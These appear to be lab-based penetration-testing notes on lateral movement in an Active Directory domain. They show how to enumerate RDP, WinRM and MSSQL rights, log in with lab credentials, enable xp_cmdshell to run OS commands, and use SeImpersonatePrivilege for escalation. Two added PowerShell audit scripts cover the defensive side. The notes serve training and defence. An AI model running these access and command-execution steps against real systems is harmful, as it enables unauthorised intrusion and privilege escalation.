Privileged Access

Enumerating RDP Access

Using BloodHound

  • Query: Use the CanRDP edge or run pre-built queries like "Find Workstations where Domain Users can RDP."

  • Output: Graph shows DOMAIN USERS@INLANEFREIGHT.LOCAL with CanRDP to ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL.

  • Node Info: For WLEY@INLANEFREIGHT.LOCAL, check "Execution Rights" to confirm group-delegated RDP privileges.

Using PowerView

C:\mrci0x1> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Desktop Users
MemberName   : INLANEFREIGHT\Domain Users
SID          : S-1-5-21-3842939050-3880317879-2865463114-513
IsGroup      : True
IsDomain     : UNKNOWN

Insight: All Domain Users can RDP to ACADEMY-EA-MS01, increasing the risk of sensitive data exposure.

Accessing a Host via RDP

From Windows

C:\mrci0x1> mstsc.exe /v:ACADEMY-EA-MS01
  • Enter credentials for INLANEFREIGHT\wley (e.g., transporter@4).

From Linux

C:\mrci0x1> xfreerdp /u:wley /p:transporter@4 /v:172.16.5.25

Why use RDP? It provides GUI access for reconnaissance, privilege escalation, or data collection.

Enumerating WinRM Access

Using BloodHound

Custom Cypher Query:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

Output: Graph shows FOREND@INLANEFREIGHT.LOCAL with CanPSRemote to ACADEMY-EA-MS01.

Using PowerView

C:\mrci0x1> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Management Users
MemberName   : INLANEFREIGHT\forend
SID          : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup      : False
IsDomain     : UNKNOWN
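Defender-side check covering both the RDP and WinRM enumeration above (an added example, not part of the original notes): it reads the same two local groups on a list of hosts through the ADSI WinNT provider and flags members that are broad principals such as Domain Users (RID 513). The host list and the broad-principal SID/RID lists are assumptions.

```powershell
# Added example: audit "Remote Desktop Users" / "Remote Management Users" on
# several hosts and flag broad principals. Assumes the current token can reach
# each host over RPC/SMB; host names and the broad SID/RID lists are assumptions.
$Computers = @('ACADEMY-EA-MS01', 'ACADEMY-EA-DB01')
$Groups    = @('Remote Desktop Users', 'Remote Management Users')

# Well-known SIDs / domain RIDs that should not hold a remote-logon right on a server.
$BroadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')   # Everyone, Authenticated Users, BUILTIN\Users
$BroadRids = @('513', '515')                            # Domain Users, Domain Computers

function Get-RemoteLocalGroupMember {
    param([string]$ComputerName, [string]$GroupName)
    $group = [ADSI]"WinNT://$ComputerName/$GroupName,group"
    foreach ($m in @($group.Invoke('Members'))) {
        $name  = $m.GetType().InvokeMember('Name', 'GetProperty', $null, $m, $null)
        $bytes = $m.GetType().InvokeMember('objectSid', 'GetProperty', $null, $m, $null)
        $sid   = (New-Object System.Security.Principal.SecurityIdentifier($bytes, 0)).Value
        [pscustomobject]@{ ComputerName = $ComputerName; GroupName = $GroupName; MemberName = $name; SID = $sid }
    }
}

function Test-BroadPrincipal {
    param([string]$Sid)
    if ($BroadSids -contains $Sid) { return $true }
    $rid = $Sid.Split('-')[-1]
    return ($Sid -like 'S-1-5-21-*' -and $BroadRids -contains $rid)
}

foreach ($c in $Computers) {
    foreach ($g in $Groups) {
        try {
            Get-RemoteLocalGroupMember -ComputerName $c -GroupName $g | ForEach-Object {
                $flag = if (Test-BroadPrincipal $_.SID) { 'BROAD' } else { 'ok' }
                '{0,-6} {1,-18} {2,-25} {3}' -f $flag, $_.ComputerName, $_.GroupName, $_.MemberName
            }
        } catch {
            "ERROR  $c  $g  $($_.Exception.Message)"
        }
    }
}
```

A BROAD line for Domain Users in Remote Desktop Users reproduces the finding from the PowerView output above; the fix is to replace the broad group with a dedicated, scoped group.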

Accessing a Host via WinRM

From Windows

C:\mrci0x1> $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
C:\mrci0x1> $cred = New-Object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
C:\mrci0x1> Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> hostname
ACADEMY-EA-MS01
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> Exit-PSSession

From Linux

C:\mrci0x1> gem install evil-winrm
C:\mrci0x1> evil-winrm -i 172.16.5.25 -u forend -p Klmcargo2

Enumerating MSSQL Access

Using BloodHound

Custom Cypher Query:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

Output: Graph shows DAMUNDSEN@INLANEFREIGHT.LOCAL with SQLAdmin on ACADEMY-EA-DB01.

Using PowerUpSQL

C:\mrci0x1> cd .\PowerUpSQL\
C:\mrci0x1> Import-Module .\PowerUpSQL.ps1
C:\mrci0x1> Get-SQLInstanceDomain
ComputerName     : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL
Instance         : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433
DomainAccountSid : 1500000521000170152142291832437223174127203170152400
DomainAccount    : damundsen
DomainAccountCn  : Dana Amundsen
Service          : MSSQLSvc
Spn              : MSSQLSvc/ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL:1433
LastLogon        : 4/6/2022 11:59 AM

Accessing MSSQL Server

From Windows

C:\mrci0x1> Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
VERBOSE: 172.16.5.150,1433 : Connection Success.

Column1
-------
Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) ...

From Linux

C:\mrci0x1> mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands

Enable xp_cmdshell:

SQL> enable_xp_cmdshell
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
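Audit counterpart to the xp_cmdshell step (an added example, not part of the original notes): it queries the instance for the xp_cmdshell configuration state and lists which logins hold sysadmin, since any of them can enable xp_cmdshell exactly as shown above. It uses the current Windows token over System.Data.SqlClient; the instance name is an assumption.

```powershell
# Added example: check whether xp_cmdshell is enabled and who is sysadmin.
# Assumes Windows authentication with the current token; instance is an assumption.
$Instance = 'ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433'

function Invoke-AuditQuery {
    param([string]$Instance, [string]$Query)
    $connString = "Server=$Instance;Integrated Security=True;Encrypt=True;TrustServerCertificate=True"
    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $connString
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $Query
        $table = New-Object System.Data.DataTable
        $table.Load($cmd.ExecuteReader())
        return $table
    } finally { $conn.Close() }
}

# 1. Is xp_cmdshell on? value_in_use is 1 when it is (the output above flips it 0 -> 1).
$cfg = Invoke-AuditQuery -Instance $Instance -Query @"
SELECT name, value_in_use FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');
"@
foreach ($row in $cfg.Rows) {
    $state = if ([int]$row.value_in_use -eq 1) { 'ENABLED' } else { 'disabled' }
    '{0,-22} {1}' -f $row.name, $state
}

# 2. Which logins are sysadmin? Each can enable xp_cmdshell and run commands
#    in the SQL service account's context.
$admins = Invoke-AuditQuery -Instance $Instance -Query @"
SELECT sp.name, sp.type_desc
FROM sys.server_principals sp
JOIN sys.server_role_members rm ON rm.member_principal_id = sp.principal_id
JOIN sys.server_principals r  ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin';
"@
foreach ($row in $admins.Rows) { '{0,-40} {1}' -f $row.name, $row.type_desc }
```

An ENABLED xp_cmdshell or a domain user login in the sysadmin list is the condition the walkthrough relies on; disable the option and trim the role membership.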

Execute OS Command:

SQL> xp_cmdshell whoami /priv
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Note: SeImpersonatePrivilege can be exploited with tools like JuicyPotato or PrintSpoofer for SYSTEM-level escalation.